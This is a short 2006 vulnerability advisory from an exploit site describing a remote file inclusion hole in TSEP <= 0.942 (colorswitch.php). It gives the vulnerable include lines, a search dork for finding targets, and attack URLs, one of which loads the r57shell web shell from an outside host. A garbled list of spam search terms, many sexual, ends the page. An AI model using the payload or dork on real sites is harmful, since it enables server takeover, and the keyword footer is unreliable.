about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , TSEP <= 0.942 (colorswitch.php) Remote Inclusion Vulnerability




2006-08-02 TSEP <= 0.942 (colorswitch.php) Remote Inclusion Vulnerability
Rated as : High Risk

Script: TSEP <= 0.942
URL:  www.tsep.info
Discovered: beford <xbefordx gmail com>
Comments: "register_globals" must be enabled duh.
document.this != http://www.milw0rm.com/exploits/2098
Vulnerable Files/Code:

./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
./tsep.0942/include/printpagedetails.php => require_once(
$tsep_config["absPath"]."/include/convert_htmlent.php"
);
./tsep.0942/include/ipfunctions.php => require_once(
$tsep_config["absPath"]."/include/IPv6.php" );
./tsep.0942/include/contentimages.class.php => require_once(
$tsep_config["absPath"]."/include/contentimages.class.php"
);
./tsep.0942/include/configfunctions.php => require_once(
$tsep_config["absPath"]."/include/mmexfunctions.php"
);
./tsep.0942/include/log.class.php => require_once(
$tsep_config["absPath"]."/include/tseptrace.php" );

Not-leet-enough: "Powered By TSEP"

POC:
http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/?


securitydot.net - 2006-08-02

Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 19:32:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
/cgi-bin/j pinkci t66t Bangladsh exploits+f www.sex-.i alan live india www.sexwor load 32 www.rude-b alison ang ASIAN4YOU. phphtml.ph www.cartoo a...toolba Show sexcy SCS sshd news for c sexy girls nude pictu WWW.FTVGIR 200 /compo www nudeph PHP/4.3.10 microsoft SAXY VADIO Kisah+seks /WebBoard/ Fedora cor Babefuka.c shop asp s ms windows Sexy*video RTMP phpBB por WINZIP news for c Contrexx blog.sina. movex Unreal ir %2Fmodules SANIA MIRZ window2003 80.com Gay indone WGR614 Sexlady.P Sexvidex